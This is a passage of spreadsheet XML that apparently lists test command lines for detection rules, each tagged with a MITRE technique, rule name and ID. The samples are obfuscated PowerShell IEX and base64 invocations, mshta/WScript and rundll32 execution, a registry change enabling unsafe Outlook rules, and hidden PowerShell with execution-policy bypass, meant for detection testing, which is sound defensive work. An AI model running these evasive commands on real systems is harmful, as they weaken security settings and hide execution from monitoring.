        <v>0</v>
      </c>
      <c r="G3652" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3652" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3652" s="43" t="n"/>
      <c r="J3652" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3652" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3653" ht="15.75" customHeight="1" s="42">
      <c r="A3653" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3653" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C3653" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D3653" s="43" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E3653" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; ( '{0}{1}{2}' -f 'I','EX','' ) ('Wri'+'te-H'+'ost ''Bypass''')"</t>
        </is>
      </c>
      <c r="F3653" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3653" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3653" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3653" s="43" t="n"/>
      <c r="J3653" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3653" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3654" ht="15.75" customHeight="1" s="42">
      <c r="A3654" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3654" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C3654" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D3654" s="43" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E3654" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $cmd = 'IEX' ; &amp; $cmd ('Wri'+'te-H'+'ost ''Bypass'') }"</t>
        </is>
      </c>
      <c r="F3654" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3654" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3654" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3654" s="43" t="n"/>
      <c r="J3654" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3654" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3655" ht="15.75" customHeight="1" s="42">
      <c r="A3655" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3655" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C3655" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D3655" s="43" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E3655" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { function Invoke-Command { param($cmd) iex $cmd } Invoke-Command ('Wri'+'te-H'+'ost ''Bypass'') }"</t>
        </is>
      </c>
      <c r="F3655" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3655" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3655" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3655" s="43" t="n"/>
      <c r="J3655" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3655" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3656" ht="15.75" customHeight="1" s="42">
      <c r="A3656" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3656" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C3656" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D3656" s="43" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E3656" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $cmd = 'Write-Host'; $arg = 'Bypass'; &amp; $cmd $arg }"</t>
        </is>
      </c>
      <c r="F3656" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3656" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3656" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3656" s="43" t="n"/>
      <c r="J3656" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3656" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3657" ht="15.75" customHeight="1" s="42">
      <c r="A3657" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3657" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C3657" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D3657" s="43" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E3657" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $cmd = 'Write-Host'; &amp; $cmd 'Bypass' }"</t>
        </is>
      </c>
      <c r="F3657" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3657" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3657" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3657" s="43" t="n"/>
      <c r="J3657" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3657" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3658" ht="15.75" customHeight="1" s="42">
      <c r="A3658" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3658" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C3658" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D3658" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E3658" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[char[]](83,116,97,114,116,45,80,114,111,99,101,115,115,32,99,97,108,99,46,101,120,101) | Join-String -Separator ''"</t>
        </is>
      </c>
      <c r="F3658" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3658" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3658" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3658" s="43" t="n"/>
      <c r="J3658" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3658" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3659" ht="15.75" customHeight="1" s="42">
      <c r="A3659" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3659" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C3659" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D3659" s="43" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E3659" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Convert]::FromBase64String('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F3659" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3659" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3659" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3659" s="43" t="n"/>
      <c r="J3659" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3659" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3660" ht="15.75" customHeight="1" s="42">
      <c r="A3660" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3660" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C3660" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D3660" s="43" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E3660" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F3660" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3660" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3660" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3660" s="43" t="n"/>
      <c r="J3660" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3660" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3661" ht="15.75" customHeight="1" s="42">
      <c r="A3661" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3661" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C3661" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D3661" s="43" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E3661" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:Software\Microsoft\Windows\CurrentVersion Debug).Debug)))"</t>
        </is>
      </c>
      <c r="F3661" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3661" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3661" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3661" s="43" t="n"/>
      <c r="J3661" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3661" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3662" ht="15.75" customHeight="1" s="42">
      <c r="A3662" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3662" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C3662" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D3662" s="43" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E3662" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Convert]::FromBase64String([System.Text.Encoding]::ASCII.GetString([System.Text.Encoding]::ASCII.GetBytes('SGVsbG8gV29ybGQ=')))"</t>
        </is>
      </c>
      <c r="F3662" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3662" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3662" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3662" s="43" t="n"/>
      <c r="J3662" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3662" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3663" ht="15.75" customHeight="1" s="42">
      <c r="A3663" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3663" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C3663" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D3663" s="43" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E3663" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Convert]::FromBase64String([System.Text.Encoding]::ASCII.GetString([System.Text.Encoding]::ASCII.GetBytes([System.Text.Encoding]::ASCII.GetBytes('SGVsbG8gV29ybGQ='))))"</t>
        </is>
      </c>
      <c r="F3663" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3663" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3663" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3663" s="43" t="n"/>
      <c r="J3663" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3663" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3664" ht="15.75" customHeight="1" s="42">
      <c r="A3664" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3664" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_udl_exec</t>
        </is>
      </c>
      <c r="C3664" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32.EXE Execution of UDL File</t>
        </is>
      </c>
      <c r="D3664" s="43" t="inlineStr">
        <is>
          <t>0ea52357-cd59-4340-9981-c46c7e900428</t>
        </is>
      </c>
      <c r="E3664" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c rundll32.exe oledb32.dll,OpenDSLFile C:\Users\user\Downloads\test.udl</t>
        </is>
      </c>
      <c r="F3664" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3664" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3664" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3664" s="43" t="n"/>
      <c r="J3664" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3664" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3665" ht="15.75" customHeight="1" s="42">
      <c r="A3665" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3665" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_udl_exec</t>
        </is>
      </c>
      <c r="C3665" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32.EXE Execution of UDL File</t>
        </is>
      </c>
      <c r="D3665" s="43" t="inlineStr">
        <is>
          <t>0ea52357-cd59-4340-9981-c46c7e900428</t>
        </is>
      </c>
      <c r="E3665" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe oledb32.dll,OpenDSLFile C:\ProgramData\test.udl</t>
        </is>
      </c>
      <c r="F3665" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3665" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3665" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3665" s="43" t="n"/>
      <c r="J3665" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3665" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3666" ht="15.75" customHeight="1" s="42">
      <c r="A3666" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3666" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_symlinkevaluation</t>
        </is>
      </c>
      <c r="C3666" s="43" t="inlineStr">
        <is>
          <t>Fsutil Behavior Set SymlinkEvaluation</t>
        </is>
      </c>
      <c r="D3666" s="43" t="inlineStr">
        <is>
          <t>c0b2768a-dd06-4671-8339-b16ca8d1f27f</t>
        </is>
      </c>
      <c r="E3666" s="43" t="inlineStr">
        <is>
          <t>set-alias -name "fs" -value "fsutil.exe"; fs "behavior" "set" "SymlinkEvaluation" "L2L:1"</t>
        </is>
      </c>
      <c r="F3666" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3666" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3666" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3666" s="43" t="n"/>
      <c r="J3666" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3666" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3667" ht="15.75" customHeight="1" s="42">
      <c r="A3667" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3667" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_process_patterns</t>
        </is>
      </c>
      <c r="C3667" s="43" t="inlineStr">
        <is>
          <t>Potential CobaltStrike Process Patterns</t>
        </is>
      </c>
      <c r="D3667" s="43" t="inlineStr">
        <is>
          <t>f35c5d71-b489-4e22-a115-f003df287317</t>
        </is>
      </c>
      <c r="E3667" s="43" t="inlineStr">
        <is>
          <t>conhost.exe 0xffffffff -ForceV1</t>
        </is>
      </c>
      <c r="F3667" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3667" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3667" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3667" s="43" t="n"/>
      <c r="J3667" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3667" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3668" ht="15.75" customHeight="1" s="42">
      <c r="A3668" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3668" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_process_patterns</t>
        </is>
      </c>
      <c r="C3668" s="43" t="inlineStr">
        <is>
          <t>Potential CobaltStrike Process Patterns</t>
        </is>
      </c>
      <c r="D3668" s="43" t="inlineStr">
        <is>
          <t>f35c5d71-b489-4e22-a115-f003df287317</t>
        </is>
      </c>
      <c r="E3668" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C whoami</t>
        </is>
      </c>
      <c r="F3668" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3668" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3668" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3668" s="43" t="n"/>
      <c r="J3668" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3668" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3669" ht="15.75" customHeight="1" s="42">
      <c r="A3669" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3669" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_process_patterns</t>
        </is>
      </c>
      <c r="C3669" s="43" t="inlineStr">
        <is>
          <t>Potential CobaltStrike Process Patterns</t>
        </is>
      </c>
      <c r="D3669" s="43" t="inlineStr">
        <is>
          <t>f35c5d71-b489-4e22-a115-f003df287317</t>
        </is>
      </c>
      <c r="E3669" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C echo test &gt; \\.\pipe\testpipe</t>
        </is>
      </c>
      <c r="F3669" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3669" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3669" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3669" s="43" t="n"/>
      <c r="J3669" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3669" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3670" ht="15.75" customHeight="1" s="42">
      <c r="A3670" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3670" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sliver_c2_execution_pattern</t>
        </is>
      </c>
      <c r="C3670" s="43" t="inlineStr">
        <is>
          <t>HackTool - Sliver C2 Implant Activity Pattern</t>
        </is>
      </c>
      <c r="D3670" s="43" t="inlineStr">
        <is>
          <t>42333b2c-b425-441c-b70e-99404a17170f</t>
        </is>
      </c>
      <c r="E3670" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "[Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8"</t>
        </is>
      </c>
      <c r="F3670" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3670" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3670" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3670" s="43" t="n"/>
      <c r="J3670" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3670" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3671" ht="15.75" customHeight="1" s="42">
      <c r="A3671" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3671" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_runscripthelper</t>
        </is>
      </c>
      <c r="C3671" s="43" t="inlineStr">
        <is>
          <t>Suspicious Runscripthelper.exe</t>
        </is>
      </c>
      <c r="D3671" s="43" t="inlineStr">
        <is>
          <t>eca49c87-8a75-4f13-9c73-a5a29e845f03</t>
        </is>
      </c>
      <c r="E3671" s="43" t="inlineStr">
        <is>
          <t>runscripthelper.exe surfacecheck script.ps1 C:\Windows\Temp\..\Windows\Temp</t>
        </is>
      </c>
      <c r="F3671" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3671" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3671" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3671" s="43" t="n"/>
      <c r="J3671" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3671" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3672" ht="15.75" customHeight="1" s="42">
      <c r="A3672" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3672" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_inline_vbscript</t>
        </is>
      </c>
      <c r="C3672" s="43" t="inlineStr">
        <is>
          <t>Wscript Shell Run In CommandLine</t>
        </is>
      </c>
      <c r="D3672" s="43" t="inlineStr">
        <is>
          <t>2c28c248-7f50-417a-9186-a85b223010ee</t>
        </is>
      </c>
      <c r="E3672" s="43" t="inlineStr">
        <is>
          <t>mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""calc.exe""")</t>
        </is>
      </c>
      <c r="F3672" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3672" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3672" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3672" s="43" t="n"/>
      <c r="J3672" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3672" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3673" ht="15.75" customHeight="1" s="42">
      <c r="A3673" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3673" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_inline_vbscript</t>
        </is>
      </c>
      <c r="C3673" s="43" t="inlineStr">
        <is>
          <t>Wscript Shell Run In CommandLine</t>
        </is>
      </c>
      <c r="D3673" s="43" t="inlineStr">
        <is>
          <t>2c28c248-7f50-417a-9186-a85b223010ee</t>
        </is>
      </c>
      <c r="E3673" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Activator]::CreateInstance([Type]::GetTypeFromProgID('WScript.Shell')).Run('calc.exe')"</t>
        </is>
      </c>
      <c r="F3673" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3673" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3673" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3673" s="43" t="n"/>
      <c r="J3673" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3673" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3674" ht="15.75" customHeight="1" s="42">
      <c r="A3674" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3674" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_inline_vbscript</t>
        </is>
      </c>
      <c r="C3674" s="43" t="inlineStr">
        <is>
          <t>Wscript Shell Run In CommandLine</t>
        </is>
      </c>
      <c r="D3674" s="43" t="inlineStr">
        <is>
          <t>2c28c248-7f50-417a-9186-a85b223010ee</t>
        </is>
      </c>
      <c r="E3674" s="43" t="inlineStr">
        <is>
          <t>mshta.exe about:&lt;hta:application&gt;&lt;script language="VBScript"&gt;Execute("CreateObject(""Wscript.Shell"").Run ""calc.exe""")&lt;/script&gt;</t>
        </is>
      </c>
      <c r="F3674" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3674" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3674" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3674" s="43" t="n"/>
      <c r="J3674" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3674" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3675" ht="15.75" customHeight="1" s="42">
      <c r="A3675" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3675" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C3675" s="43" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D3675" s="43" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E3675" s="43" t="inlineStr">
        <is>
          <t>reg.exe add "HKCU\Software\Policies\Microsoft\Office\16.0\Outlook\Security" /v EnableUnsafeClientMailRules /t REG_DWORD /d 1 /f</t>
        </is>
      </c>
      <c r="F3675" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3675" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3675" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3675" s="43" t="n"/>
      <c r="J3675" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3675" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3676" ht="15.75" customHeight="1" s="42">
      <c r="A3676" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3676" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C3676" s="43" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D3676" s="43" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E3676" s="43" t="inlineStr">
        <is>
          <t>set "p1=EnableUnsafe" &amp;&amp; set "p2=ClientMailRules" &amp;&amp; reg add "HKCU\Software\Policies\Microsoft\Office\16.0\Outlook\Security" /v %p1%%p2% /t REG_DWORD /d 1 /f</t>
        </is>
      </c>
      <c r="F3676" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3676" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3676" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3676" s="43" t="n"/>
      <c r="J3676" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3676" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3677" ht="15.75" customHeight="1" s="42">
      <c r="A3677" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3677" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_php_inline_command_execution</t>
        </is>
      </c>
      <c r="C3677" s="43" t="inlineStr">
        <is>
          <t>Php Inline Command Execution</t>
        </is>
      </c>
      <c r="D3677" s="43" t="inlineStr">
        <is>
          <t>d81871ef-5738-47ab-9797-7a9c90cd4bfb</t>
        </is>
      </c>
      <c r="E3677" s="43" t="inlineStr">
        <is>
          <t>php.exe -r "system('whoami');"</t>
        </is>
      </c>
      <c r="F3677" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3677" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3677" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3677" s="43" t="n"/>
      <c r="J3677" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3677" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3678" ht="15.75" customHeight="1" s="42">
      <c r="A3678" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3678" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_php_inline_command_execution</t>
        </is>
      </c>
      <c r="C3678" s="43" t="inlineStr">
        <is>
          <t>Php Inline Command Execution</t>
        </is>
      </c>
      <c r="D3678" s="43" t="inlineStr">
        <is>
          <t>d81871ef-5738-47ab-9797-7a9c90cd4bfb</t>
        </is>
      </c>
      <c r="E3678" s="43" t="inlineStr">
        <is>
          <t>php.exe -r "system(`whoami`);"</t>
        </is>
      </c>
      <c r="F3678" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3678" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3678" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3678" s="43" t="n"/>
      <c r="J3678" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3678" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3679" ht="15.75" customHeight="1" s="42">
      <c r="A3679" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3679" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_php_inline_command_execution</t>
        </is>
      </c>
      <c r="C3679" s="43" t="inlineStr">
        <is>
          <t>Php Inline Command Execution</t>
        </is>
      </c>
      <c r="D3679" s="43" t="inlineStr">
        <is>
          <t>d81871ef-5738-47ab-9797-7a9c90cd4bfb</t>
        </is>
      </c>
      <c r="E3679" s="43" t="inlineStr">
        <is>
